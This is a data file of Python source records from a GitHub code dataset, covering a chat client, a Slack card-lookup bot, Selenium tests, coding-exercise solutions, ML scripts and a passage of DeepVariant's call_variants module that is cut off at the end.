w[0]","repo_name":"giulioturrisi/Differential-Drive-Robot","sub_path":"python_scripts/controllers/io_linearization_mpc.py","file_name":"io_linearization_mpc.py","file_ext":"py","file_size_in_byte":5953,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"} +{"seq_id":"2712197241","text":"#Embedded file name: arch/win32/photouploader/helpers.py\nfrom comtypes import COMError\nfrom dropbox.camera import PhotoImportDisconnected\nfrom dropbox.camera.util import is_apple_device\nfrom dropbox.functions import convert_to_twos_complement\nfrom dropbox.trace import TRACE, report_bad_assumption\nfrom pynt.constants import COM_ERROR_BUSY, COM_ERROR_DEVICE_NOT_CONNECTED, COM_ERROR_FILE_NOT_FOUND, COM_ERROR_GEN_FAILURE, COM_ERROR_NOT_FOUND, COM_ERROR_OPERATION_ABORTED, COM_ERROR_SEM_TIMEOUT, E_FAIL, E_WPD_DEVICE_IS_HUNG, E_WPD_DEVICE_NOT_OPEN, WIA_ERROR_BUSY, WIA_ERROR_OFFLINE\nDISCONNECTED_ERRORS = set([COM_ERROR_BUSY,\n COM_ERROR_DEVICE_NOT_CONNECTED,\n COM_ERROR_FILE_NOT_FOUND,\n COM_ERROR_GEN_FAILURE,\n COM_ERROR_NOT_FOUND,\n COM_ERROR_OPERATION_ABORTED,\n COM_ERROR_SEM_TIMEOUT,\n E_FAIL,\n E_WPD_DEVICE_IS_HUNG,\n E_WPD_DEVICE_NOT_OPEN,\n WIA_ERROR_BUSY,\n WIA_ERROR_OFFLINE])\nMAX_DISCONNECTED_ERRORS = 5\n\ndef handle_device_disconnect_exceptions(device, exc):\n if is_disconnected_error(exc):\n try:\n device.num_disconnected_errors += 1\n except AttributeError:\n device.num_disconnected_errors = 1\n\n TRACE('Caught a potential disconnected error')\n if is_apple_device(device) and exc.hresult == E_WPD_DEVICE_IS_HUNG:\n report_bad_assumption('Transfer interrupted due to iTunes backup!')\n if device.num_disconnected_errors >= MAX_DISCONNECTED_ERRORS:\n TRACE('!! Too many disconnected errors. Raising PhotoImportDisconnected')\n device.disconnected = True\n raise PhotoImportDisconnected()\n return True\n if isinstance(exc, PhotoImportDisconnected):\n raise exc\n\n\ndef is_disconnected_error(exc):\n if isinstance(exc, COMError) and convert_to_twos_complement(exc.hresult) in DISCONNECTED_ERRORS:\n return True\n return False\n","repo_name":"bizonix/DropBoxLibrarySRC","sub_path":"pyc_decrypted/latest/arch/win32/photouploader/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"11815646880","text":"import socket, os, time\nfrom threading import Thread\nimport cursor\n\n\nSEPARATOR = \"\"\nBUFFER_SIZE = 4096 # send 4096 bytes each time step\n\n# the ip address or hostname of the server, the receiver\nSERVER_HOST = \"192.168.121.128\"\nSERVER_PORT = 5020\n\nSCREEN_HOST = \"192.168.121.128\"\nSCREEN_PORT = 5024\n\n\n# create the client socket\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.bind((SCREEN_HOST, SCREEN_PORT))\n\n\n#print(f\"[+] Connecting to {SERVER_HOST}:{SERVER_PORT}\")\n#s.connect((SERVER_HOST, SERVER_PORT))\n#print(\"[+] Connected.\")\n\n\n#print(\"[@] Enter Your User Name(Nickname): \")\n#USER = input(\"[@] Enter Your User Name(Nickname): \")\n#USER += \"ŒSEPŒ\"\n#s.sendto(USER.encode('utf-8'), (host, port))\n\ndata, addr = s.recvfrom(1024)\nRCV = data.decode('utf-8')\n\ncursor.delete_last_line()\nprint(f\"[@] Enter Your User Name(Nickname): {RCV[:-5]}\")\n\n#s.send(f\"{filename}{SEPARATOR}{filesize}\".encode())\nwhile True:\n\tdata, addr = s.recvfrom(1024)\n\tRCV = data.decode('utf-8')\n\ttry:\n\t\tDATA = data.split('ŒSEPŒ')\n\texcept:\n\t\tpass\n\n\tif 'ŒEXITŒ' in DATA[0]:\n\t\tprint(\"[+] Disconnected.\")\n\t\tbreak\n\telif len(DATA) == 2:\n\t\tprint(f\"{DATA[1]}: {DATA[0]}\")\n\telif len(DATA) == 1:\n\t\tprint(DATA)\n\t\ns.close()\n","repo_name":"kjh-icnl/CHATTER","sub_path":"chat-screen.py","file_name":"chat-screen.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42536307685","text":"f = open(\"input5.txt\",\"r\")\nfor line in f:\n path.append(line[:-1])\npath = [int(x) for x in path]\n\n#part 2\ndef loopedList2(numberList):\n steps = 0\n i = 0\n while True:\n try:\n jump = numberList[i]\n if jump >= 3:\n numberList[i] -= 1\n else:\n numberList[i] += 1\n i += jump\n steps += 1\n except IndexError:\n return steps\n\t\t\t\nprint(loopedList2(path))","repo_name":"jgoodbody/Advent_of_Code_2017","sub_path":"day5/day5p2.py","file_name":"day5p2.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11391605979","text":"import time\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\n\n\ndef test_positive(app):\n # Добавляем в корзину три товара\n for _ in range(3):\n app.wd.get(\"https://litecart.stqa.ru/ru/\")\n\n app.wd.find_elements_by_css_selector(\"div#box-most-popular li.product\")[0].click()\n\n quantity = app.wd.find_element_by_css_selector(\"span.quantity\")\n quantity_text = quantity.text\n app.wd.find_element_by_css_selector(\"button[name=add_cart_product]\").click()\n wait = WebDriverWait(app.wd, 10)\n wait.until_not(lambda d: d.find_element_by_name(\"span.quantity\").text == quantity_text)\n\n # Нажимаем на ссылку 'Checkout'\n app.wd.find_element_by_xpath(\"//a[text()='Checkout »']\").click()\n shortcuts_num = len(app.wd.find_elements_by_css_selector(\"li.shortcut\"))\n\n if shortcuts_num == 0:\n items_num = 1\n else:\n items_num = shortcuts_num\n\n # Ждем загрузку страницы с корзиной\n wait = WebDriverWait(app.wd, 10)\n wait.until(ec.visibility_of_element_located((By.CSS_SELECTOR, \"div#order_confirmation-wrapper table\")))\n time.sleep(1)\n\n # Удаляем все товары из корзины\n for _ in range(items_num):\n if len(app.wd.find_elements_by_css_selector(\"li.shortcut\")) > 0:\n app.wd.find_elements_by_css_selector(\"li.shortcut\")[0].click()\n\n table = app.wd.find_element_by_css_selector(\"div#order_confirmation-wrapper table\")\n\n app.wd.find_elements_by_css_selector(\"button[name=remove_cart_item]\")[0].click()\n\n wait = WebDriverWait(app.wd, 10)\n wait.until(ec.staleness_of(table))\n","repo_name":"dmsabel/selenium_complete_guide","sub_path":"tests/lec7/test_cart.py","file_name":"test_cart.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2751476687","text":"# TestPySide.py\nimport sys\n\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\n\n# Define Form\nclass Form(QDialog):\n def __init__(self,parent=None):\n super(Form,self).__init__(parent)\n self.setWindowTitle('Test Form') \n\n# Main function\nif __name__=='__main__':\n\n # Create Qt App\n app=QApplication(sys.argv)\n\n # Create window\n NewForm=Form()\n NewForm.show()\n\n # exit\n sys.exit(app.exec_())\n","repo_name":"mrtigercn/myapp","sub_path":"gui/qt.py","file_name":"qt.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10429161571","text":"from transformers import AutoTokenizer, AutoModel, FeatureExtractionPipeline\nfrom datasets import load_dataset\nfrom transformers.pipelines.pt_utils import KeyDataset\nimport pandas as pd\nimport torch\nimport numpy as np\nimport argparse\nfrom tqdm.auto import tqdm\nimport sys\nsys.path.insert(0, '.')\nimport altair as alt\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--output_file', default='./data/test/data.csv')\nparser.add_argument('--model', default='bert-base-cased')\nparser.add_argument('--tokenizer', default='bert-base-cased')\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n \n cuda_available = torch.cuda.is_available()\n device = 0 if cuda_available else -1\n \n tokenizer = AutoTokenizer.from_pretrained(args.tokenizer) \n model = AutoModel.from_pretrained(args.model)\n\n dataset = load_dataset(\"tweet_eval\", \"sentiment\")\n dataset = dataset[\"test\"]\n \n dataset = dataset.shuffle(seed=14).select(range(600))\n\n # get embeddings from sentence tokens\n distances_cls = []\n distances_avg = []\n distances_tokens = []\n \n pipe = FeatureExtractionPipeline(model, tokenizer, framweork=\"pt\", return_tensors=True, device=device)\n for embed in tqdm(pipe(KeyDataset(dataset, \"text\"), batch_size=32), total=len(dataset)):\n cls_embed = embed[:, 0, :].detach().numpy()\n word_embed = embed[:, 1:, :].squeeze(0).detach().numpy()\n # using inner product distance\n # and also cosine similarity\n # get the distances between the [CLS] token and the other tokens\n distances_cls += [np.inner(cls_embed, word_embed[i]) for i in range(word_embed.shape[0])]\n distances_cls += [np.inner(cls_embed, word_embed[i]) / (np.linalg.norm(cls_embed) * np.linalg.norm(word_embed[i])) for i in range(word_embed.shape[0])]\n # get the distances between the average of the tokens and the other tokens\n distances_avg += [np.inner(np.average(word_embed, axis=0), word_embed[i]) for i in range(word_embed.shape[0])]\n distances_avg += [np.inner(np.average(word_embed, axis=0), word_embed[i]) / (np.linalg.norm(np.average(word_embed, axis=0)) * np.linalg.norm(word_embed[i])) for i in range(word_embed.shape[0])]\n # get the distances between the tokens\n distances_tokens += [np.inner(word_embed[i], word_embed[j]) for i in range(word_embed.shape[0]) for j in range(word_embed.shape[0]) if i != j]\n distances_tokens += [np.inner(word_embed[i], word_embed[j]) / (np.linalg.norm(word_embed[i]) * np.linalg.norm(word_embed[j])) for i in range(word_embed.shape[0]) for j in range(word_embed.shape[0]) if i != j]\n \n # plot the distribution of the distances to cls token\n df = pd.DataFrame({\"distances_cls\": distances_cls})\n # get the first element of every list\n df[\"distances_cls\"] = df[\"distances_cls\"].apply(lambda x: x[0])\n df[\"distances_cls\"] = pd.cut(df[\"distances_cls\"], bins=100)\n df = df.groupby(\"distances_cls\").size().reset_index(name=\"count\")\n df[\"distances_cls\"] = df[\"distances_cls\"].astype(str)\n chart1 = alt.Chart(df).mark_bar().encode(\n x=alt.X(\"distances_cls\", title=\"Distance to [CLS] token\"),\n y=alt.Y(\"count\", title=\"Count\"),\n ).properties(\n width=300,\n height=300,\n title=\"Distribution of distances to [CLS] token\"\n )\n \n # plot the distribution of the distances to average token\n df = pd.DataFrame({\"distances_avg\": distances_avg})\n df[\"distances_avg\"] = pd.cut(df[\"distances_avg\"], bins=100)\n df = df.groupby(\"distances_avg\").size().reset_index(name=\"count\")\n df[\"distances_avg\"] = df[\"distances_avg\"].astype(str)\n chart2 = alt.Chart(df).mark_bar().encode(\n x=alt.X(\"distances_avg\", title=\"Distance to average token\"),\n y=alt.Y(\"count\", title=\"Count\"),\n ).properties(\n width=300,\n height=300,\n title=\"Distribution of distances to average token\"\n )\n\n # plot the distribution of the distances between tokens\n df = pd.DataFrame({\"distances_tokens\": distances_tokens})\n df[\"distances_tokens\"] = pd.cut(df[\"distances_tokens\"], bins=100)\n df = df.groupby(\"distances_tokens\").size().reset_index(name=\"count\")\n df[\"distances_tokens\"] = df[\"distances_tokens\"].astype(str)\n chart3 = alt.Chart(df).mark_bar().encode(\n x=alt.X(\"distances_tokens\", title=\"Distance between tokens\"),\n y=alt.Y(\"count\", title=\"Count\"),\n ).properties(\n width=300,\n height=300,\n title=\"Distribution of distances between tokens\"\n )\n\n chart = chart1 | chart2 | chart3\n chart.save(args.output_file)","repo_name":"CarlOwOs/text-nnk","sub_path":"src/visualization/BERT-embedding-comparison.py","file_name":"BERT-embedding-comparison.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72971765691","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 21 23:07:12 2021\n\n@author: Seo\n\"\"\"\n\nimport os\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread\n\n\ndirpath = \"F:/PycharmProjects/calculator-impact-labelled\"\n\nfilenames = os.listdir(dirpath)\nimgfilenames = [i for i in filenames if '.png' in i]\ntxtfilenames = [i for i in filenames if '.txt' in i]\nrelabel = False\n\nfor i in range(len(imgfilenames)):\n \n imgfilepath = os.path.join(dirpath, filenames[i])\n print(\"Loading %s\" % (imgfilepath))\n txtfilename = os.path.splitext(filenames[i])[0]+\".txt\"\n if txtfilename in txtfilenames and relabel is False:\n print(\"Already labelled, skipping\")\n continue\n \n img = imread(imgfilepath)\n imgcols = img.shape[1]\n imgslice = img[:,int(2/3*imgcols):,:]\n \n plt.figure(1, figsize=(5,9))\n plt.ion()\n plt.clf()\n plt.imshow(imgslice)\n plt.show(block=False)\n \n instr = input()\n if instr == \"exit\":\n break\n \n # save input\n txtfilepath = os.path.join(dirpath, txtfilename)\n with open(txtfilepath, \"w\") as fp:\n fp.write(instr)\n print(\"Wrote to %s\" % (txtfilepath))\n ","repo_name":"icyveins7/calculator-impact","sub_path":"app/scripts/labeller.py","file_name":"labeller.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37254842322","text":"import os\nimport slack\nimport json\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\nfrom swdestinybot.models import Card\nfrom django.conf import settings\nfrom django.views.decorators.csrf import csrf_exempt\nimport re\nfrom ..services import card_service\nfrom urllib.parse import unquote\n\nclients = {}\n\n@csrf_exempt\ndef handle_slack_message(request):\n payload = json.loads(request.body)\n if payload['type'] == \"url_verification\":\n return JsonResponse({ \"challenge\" : payload['challenge']})\n elif payload['type'] == \"event_callback\":\n return send_message(payload['event'])\n\n@csrf_exempt\ndef handle_message_action(request):\n if request.method == 'POST':\n action = json.loads(request.POST.get('payload'))\n if action['type'] == \"block_actions\":\n cardId = action['actions'][0]['value']\n matchedCard = card_service.get_card_by_id(int(cardId))\n if matchedCard != None:\n getClient(action['team']['id']).chat_postMessage(\n channel='#swdestiny',\n text=matchedCard['name'] + '\\n' + matchedCard['image_url'] + '\\nFull details: https://swdestinydb.com/card/' + matchedCard['code'],\n blocks=buildCardResponse(matchedCard),\n unfurl_links=False)\n return HttpResponse(\"Ok\")\n\ndef send_message(event):\n if 'username' not in event and event['type'] == 'message' and 'text' in event:\n text = event['text']\n pattern = re.compile(\"\\[\\[(.*)\\]\\]\")\n match = pattern.search(text)\n if match:\n card = match.group(1)\n matchedCards = card_service.get_cards_by_name(card)\n\n if len(matchedCards) == 1:\n getClient(event['team']).chat_postMessage(\n channel='#swdestiny',\n text=matchedCards[0]['name'] + '\\n' + matchedCards[0]['image_url'] + '\\nFull details: https://swdestinydb.com/card/' + matchedCards[0]['code'],\n blocks=buildCardResponse(matchedCards[0]),\n unfurl_links=False)\n elif len(matchedCards) > 1:\n getClient(event['team']).chat_postMessage(\n channel='#swdestiny',\n text='Multiple cards found for ' + card,\n blocks=buildMultipleResponse(card, matchedCards))\n else:\n getClient(event['team']).chat_postMessage(\n channel='#swdestiny',\n text='No card found for ' + card)\n return HttpResponse(\"Ok\")\n\ndef buildCardResponse(matchedCard):\n return [\n {\n\t\t\t\"type\": \"section\",\n\t\t\t\"text\": {\n\t\t\t\t\"type\": \"mrkdwn\",\n\t\t\t\t\"text\": \"*\" + matchedCard['name'] + \" (\" + matchedCard['set_name'] + \"|\" + str(matchedCard['set_number']) + \")\" + \"*\"\n\t\t\t}\n },\n {\n \"type\": \"image\",\n \"block_id\": \"image1\",\n \"image_url\": matchedCard['image_url'],\n \"alt_text\": matchedCard['name']\n },\n {\n\t\t\t\"type\": \"section\",\n\t\t\t\"text\": {\n\t\t\t\t\"type\": \"mrkdwn\",\n\t\t\t\t\"text\": \"\"\n\t\t\t}\n }\n ]\n\ndef buildMultipleResponse(cardName, matchedCards):\n blocks = [\n {\n\t\t\t\"type\": \"section\",\n\t\t\t\"text\": {\n\t\t\t\t\"type\": \"mrkdwn\",\n\t\t\t\t\"text\": \"Multiple cards found for *\" + cardName + \"*\"\n\t\t\t}\n },\n {\"type\": \"actions\"}\n ]\n elements = []\n for card in matchedCards:\n elements.append({\n \"type\": \"button\",\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": card['name'] + \" (\" + card['set_name'] + \"|\" + str(card['set_number']) + \")\"\n },\n \"value\": card['code'],\n \"action_id\": card['code']\n })\n blocks[1]['elements'] = elements\n return blocks\n\ndef getClient(teamId):\n if teamId not in clients:\n token = settings.SLACK_TOKENS[teamId]\n clients[teamId] = slack.WebClient(token)\n\n return clients[teamId]","repo_name":"snuffylookingnerfherder/swdestinybot","sub_path":"swdestinybot/views/slack_view.py","file_name":"slack_view.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3512649842","text":"\r\nransomNote = \"aa\" \r\nmagazine = \"aab\"\r\n\r\n#ransomNote = \"a\" \r\n#magazine = \"b\"\r\n\r\n#ransomNote = \"aa\" \r\n#magazine = \"ab\"\r\n\r\n#ransomNote = \"aaasas\" \r\n#magazine = \"ab\"\r\n\r\n#ransomNote = \"aab\"\r\n#magazine = \"baa\"\r\n\r\nlst1 = []\r\nindex1 = 0\r\nlstindex = []\r\ncount1 = 0\r\n\r\nlstran = list(map(str,str(ransomNote)))\r\nlstmag = list(map(str,str(magazine)))\r\n\r\nfor x in range(0,len(lstran)):\r\n if lstran[x] in lstmag[index1:]:\r\n index1 = lstran.index(lstmag[x])\r\n print(index1 , 'index1')\r\n count1 += index1\r\n lstindex.append(count1)\r\n print(lstindex)\r\n lst1.append(lstran[x])\r\n print(lst1)\r\n\r\nj1 = \"\".join(lst1)\r\n\r\nif j1 == ransomNote:\r\n print(True)\r\nelse:\r\n print(False)\r\n\r\n\r\n\r\n\r\n","repo_name":"kartik03091991/Leetcode","sub_path":"ransomNote_Leet.py","file_name":"ransomNote_Leet.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17350590753","text":"def temperaturas():\n n = int(input(\"n: \"))\n temperatura = []\n cont = 0\n for i in range(n):\n temperatura.append(float(input(\"temperatura em °C: \")))\n media = sum(temperatura)/n\n print(\"A média da temperatura é: %.f\" % media)\n for j in temperatura:\n if j < media:\n cont = cont + 1\n print(temperatura)\n print(\"A temperatura ficou abaixo da média %.f dias\" % cont)\n\n\nif __name__ == '__main__':\n temperaturas()\n","repo_name":"matheustxaguiar/Programming-Period-2","sub_path":"Lists/exercicio12.py","file_name":"exercicio12.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28087074899","text":"import gradio as gr\n\nfrom .pipeline import text2image_ui, image2image_ui\nfrom .process import process_ui\nfrom .hub import model_manager_ui\n\n\ndef ui(proxy=None):\n css = \"\"\".gr-small-button {\n max-width: 1.5em !important;\n min-width: 1.5em !important;\n color: #464646 !important;\n }\n \"\"\"\n with gr.Blocks(title=\"ArtCraft\", css=css) as block:\n with gr.Tabs() as tabs:\n with gr.TabItem(\"text2image\", id=1):\n _, tab1_output, tab1_ops = text2image_ui([\"image2image\", \"process\"])\n with gr.TabItem(\"image2image\", id=2):\n tab2_input, tab2_output, tab2_ops = image2image_ui([\"image2image\", \"process\"])\n with gr.TabItem(\"process\", id=3):\n tab3_input, tab3_output, tab3_ops = process_ui(\"artcraft.processors\", [\"image2image\", \"process\"])\n with gr.TabItem(\"models\", id=4):\n model_manager_ui(proxy=proxy)\n\n tab1_ops[0].click(lambda x: (gr.update(value=x), gr.Tabs.update(selected=2)), [tab1_output], [tab2_input, tabs])\n tab1_ops[1].click(lambda x: (gr.update(value=x), gr.Tabs.update(selected=3)), [tab1_output], [tab3_input, tabs])\n\n tab2_ops[0].click(lambda x: (gr.update(value=x), gr.Tabs.update(selected=2)), [tab2_output], [tab2_input, tabs])\n tab2_ops[1].click(lambda x: (gr.update(value=x), gr.Tabs.update(selected=3)), [tab2_output], [tab3_input, tabs])\n\n tab3_ops[0].click(lambda x: (gr.update(value=x), gr.Tabs.update(selected=2)), [tab3_output], [tab2_input, tabs])\n tab3_ops[1].click(lambda x: (gr.update(value=x), gr.Tabs.update(selected=3)), [tab3_output], [tab3_input, tabs])\n\n return block\n\n\ndef launch():\n ui().launch()\n","repo_name":"yinyajun/artcraft","sub_path":"artcraft/ui/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39031062699","text":"# Maximum Depth of Binary Tree\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n \n # max depth variable to track\n maxdepth = 1\n \n def maxDepth(self, root: Optional[TreeNode]) -> int:\n \n # if no root exists return 0\n if root is None:\n return 0\n \n def dfs(self, depth, root):\n \n # check for a new max depth\n self.maxdepth = max(self.maxdepth, depth)\n \n # if node children exist, continue iteration with depth + 1\n if root.left is not None:\n dfs(self, depth + 1, root.left)\n if root.right is not None:\n dfs(self, depth + 1, root.right)\n \n dfs(self, 1, root)\n \n return self.maxdepth","repo_name":"Steve-3PO/Leetcode","sub_path":"104.py","file_name":"104.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70124741053","text":"import json\nimport os\nimport time\n\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nimport numpy as np\nimport tensorflow as tf\n\nfrom deepvariant import dv_utils\nfrom deepvariant import keras_modeling as modeling\nfrom deepvariant import logging_level\nfrom deepvariant.protos import deepvariant_pb2\nfrom third_party.nucleus.io import sharded_file_utils\nfrom third_party.nucleus.io import tfrecord\nfrom third_party.nucleus.protos import variants_pb2\nfrom third_party.nucleus.util import errors\nfrom third_party.nucleus.util import proto_utils\nfrom third_party.nucleus.util import variant_utils\n\n_ALLOW_EXECUTION_HARDWARE = [\n 'auto', # Default, no validation.\n 'cpu', # Don't use accelerators, even if available.\n 'accelerator', # Must be hardware acceleration or an error will be raised.\n]\n\n# The number of digits past the decimal point that genotype likelihoods are\n# rounded to, for numerical stability.\n_GL_PRECISION = 10\n\n# This number is estimated by the following logic:\n# For a sample with 10,000,000 examples, if we log every 50,000 examples,\n# there will be 200 lines per sample.\n_LOG_EVERY_N = 50000\n\n_LOG_EVERY_N_BATCHES = 100\n\n_DEFAULT_INPUT_READ_THREADS = 32\n_DEFAULT_PREFETCH_BUFFER_BYTES = 16 * 1000 * 1000\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string(\n 'examples', None,\n 'Required. tf.Example protos containing DeepVariant candidate variants in '\n 'TFRecord format, as emitted by make_examples. Can be a comma-separated '\n 'list of files, and the file names can contain wildcard characters.')\nflags.DEFINE_string(\n 'outfile', None,\n 'Required. Destination path where we will write output candidate variants '\n 'with additional likelihood information in TFRecord format of '\n 'CallVariantsOutput protos.')\nflags.DEFINE_string(\n 'checkpoint', None,\n 'Required. Path to the TensorFlow model checkpoint to use to evaluate '\n 'candidate variant calls.')\nflags.DEFINE_integer(\n 'batch_size', 512,\n 'Number of candidate variant tensors to batch together during inference. '\n 'Larger batches use more memory but are more computational efficient.')\nflags.DEFINE_integer('max_batches', None,\n 'Max. batches to evaluate. Defaults to all.')\nflags.DEFINE_integer('num_readers', 8,\n 'Number of parallel readers to create for examples.')\nflags.DEFINE_boolean('include_debug_info', False,\n 'If true, include extra debug info in the output.')\nflags.DEFINE_boolean(\n 'debugging_true_label_mode', False,\n 'If true, read the true labels from examples and add to '\n 'output. Note that the program will crash if the input '\n 'examples do not have the label field. '\n 'When true, this will also fill everything when '\n '--include_debug_info is set to true.')\nflags.DEFINE_string(\n 'execution_hardware', 'auto',\n 'When in cpu mode, call_variants will not place any ops on the GPU, even '\n 'if one is available. In accelerator mode call_variants validates that at '\n 'least some hardware accelerator (GPU/TPU) was available for us. This '\n 'option is primarily for QA purposes to allow users to validate their '\n 'accelerator environment is correctly configured. In auto mode, the '\n 'default, op placement is entirely left up to TensorFlow. In tpu mode, '\n 'use and require TPU.')\nflags.DEFINE_string(\n 'config_string', None,\n 'String representation of a tf.ConfigProto message, with comma-separated '\n 'key: value pairs, such as \"allow_soft_placement: True\". The value can '\n 'itself be another message, such as '\n '\"gpu_options: {per_process_gpu_memory_fraction: 0.5}\".')\nflags.DEFINE_string(\n 'kmp_blocktime', '0',\n 'Value to set the KMP_BLOCKTIME environment variable to for efficient MKL '\n 'inference. See https://www.tensorflow.org/performance/performance_guide '\n 'for more information. The default value is 0, which provides the best '\n 'performance in our tests. Set this flag to \"\" to not set the variable.')\n_LIMIT = flags.DEFINE_integer(\n 'limit', 0, 'If set to > 0, limit processing to <= limit '\n 'examples.')\n\n\nclass ExecutionHardwareError(Exception):\n pass\n\n\nclass CustomCallback(tf.keras.callbacks.Callback):\n \"\"\"Custom callbacks for `predict`.\"\"\"\n\n def on_predict_batch_begin(self, batch, logs=None):\n logging.log_every_n(logging.INFO, 'Begin `predict` on batch %d.',\n _LOG_EVERY_N_BATCHES, batch)\n\n def on_predict_batch_end(self, batch, logs=None):\n logging.log_every_n(logging.INFO, 'End `predict` on batch %d.',\n _LOG_EVERY_N_BATCHES, batch)\n\n\ndef round_gls(gls, precision=None):\n \"\"\"Returns genotype likelihoods rounded to the desired precision level.\n\n Args:\n gls: A list of floats. The input genotype likelihoods at any precision.\n precision: Positive int. The number of places past the decimal point to\n round to. If None, no rounding is performed.\n\n Returns:\n A list of floats rounded to the desired precision.\n\n Raises:\n ValueError: The input gls do not sum to nearly 1.\n \"\"\"\n if abs(sum(gls) - 1) > 1e-6:\n raise ValueError(\n 'Invalid genotype likelihoods do not sum to one: sum({}) = {}'.format(\n gls, sum(gls)))\n if precision is None:\n return gls\n\n min_ix = 0\n min_gl = gls[0]\n for ix, gl in enumerate(gls):\n if gl < min_gl:\n min_gl = gl\n min_ix = ix\n\n rounded_gls = [round(gl, precision) for gl in gls]\n rounded_gls[min_ix] = max(\n 0.0,\n round(1 - sum(rounded_gls[:min_ix] + rounded_gls[min_ix + 1:]),\n precision))\n return rounded_gls\n\n\ndef write_variant_call(writer, prediction):\n \"\"\"Write the variant call based on prediction.\n\n Args:\n writer: A object with a write() function that will be called for each\n encoded_variant and genotype likelihoods.\n prediction: A [3] tensor of floats. These are the predicted genotype\n likelihoods (p00, p0x, pxx) for some alt allele x, in the same order as\n encoded_variants.\n\n Returns:\n The return status from writer.\n \"\"\"\n encoded_variant = prediction['variant']\n encoded_alt_allele_indices = prediction['alt_allele_indices']\n rounded_gls = round_gls(prediction['probabilities'], precision=_GL_PRECISION)\n\n # Write it out.\n true_labels = prediction['label'] if FLAGS.debugging_true_label_mode else None\n cvo = _create_cvo_proto(\n encoded_variant,\n rounded_gls,\n encoded_alt_allele_indices,\n true_labels,\n logits=prediction.get('logits'),\n prelogits=prediction.get('prelogits'))\n return writer.write(cvo)\n\n\ndef _create_cvo_proto(encoded_variant,\n gls,\n encoded_alt_allele_indices,\n true_labels=None,\n logits=None,\n prelogits=None):\n \"\"\"Returns a CallVariantsOutput proto from the relevant input information.\"\"\"\n variant = variants_pb2.Variant.FromString(encoded_variant)\n alt_allele_indices = (\n deepvariant_pb2.CallVariantsOutput.AltAlleleIndices.FromString(\n encoded_alt_allele_indices))\n debug_info = None\n if FLAGS.include_debug_info or FLAGS.debugging_true_label_mode:\n if prelogits is not None:\n assert prelogits.shape == (1, 1, 2048)\n prelogits = prelogits[0][0]\n debug_info = deepvariant_pb2.CallVariantsOutput.DebugInfo(\n has_insertion=variant_utils.has_insertion(variant),\n has_deletion=variant_utils.has_deletion(variant),\n is_snp=variant_utils.is_snp(variant),\n predicted_label=np.argmax(gls),\n true_label=true_labels,\n logits=logits,\n prelogits=prelogits)\n call_variants_output = deepvariant_pb2.CallVariantsOutput(\n variant=variant,\n alt_allele_indices=alt_allele_indices,\n genotype_probabilities=gls,\n debug_info=debug_info)\n return call_variants_output\n\n\ndef get_shape_and_channels_from_json(example_info_json):\n \"\"\"Returns the shape and channels list from the input json.\"\"\"\n if not tf.io.gfile.exists(example_info_json):\n logging.warning(\n 'Starting from v1.4.0, we expect %s to '\n 'include information for shape and channels.', example_info_json)\n return None, None\n with tf.io.gfile.GFile(example_info_json) as f:\n example_info = json.load(f)\n example_shape = example_info['shape']\n example_channels_enum = example_info['channels']\n logging.info(\n 'From %s: '\n 'Shape of input examples: %s, '\n 'Channels of input examples: %s.', example_info_json, str(example_shape),\n str(example_channels_enum))\n return example_shape, example_channels_enum\n\n\n# TODO: Consider creating one data loading function to re-use simliar\n# code with training in train_inceptionv3.py.\ndef get_dataset(path, example_shape):\n \"\"\"Parse TFRecords, do image preprocessing, and return the image dataset for inference and the variant/alt-allele dataset for writing the variant calls.\"\"\"\n\n proto_features = {\n 'image/encoded': tf.io.FixedLenFeature((), tf.string),\n 'variant/encoded': tf.io.FixedLenFeature((), tf.string),\n 'alt_allele_indices/encoded': tf.io.FixedLenFeature((), tf.string)\n }\n\n def _parse_example(example):\n \"\"\"Parses a serialized tf.Example.\"\"\"\n parsed_features = tf.io.parse_single_example(\n serialized=example, features=proto_features)\n image = tf.io.decode_raw(parsed_features['image/encoded'], tf.uint8)\n image = 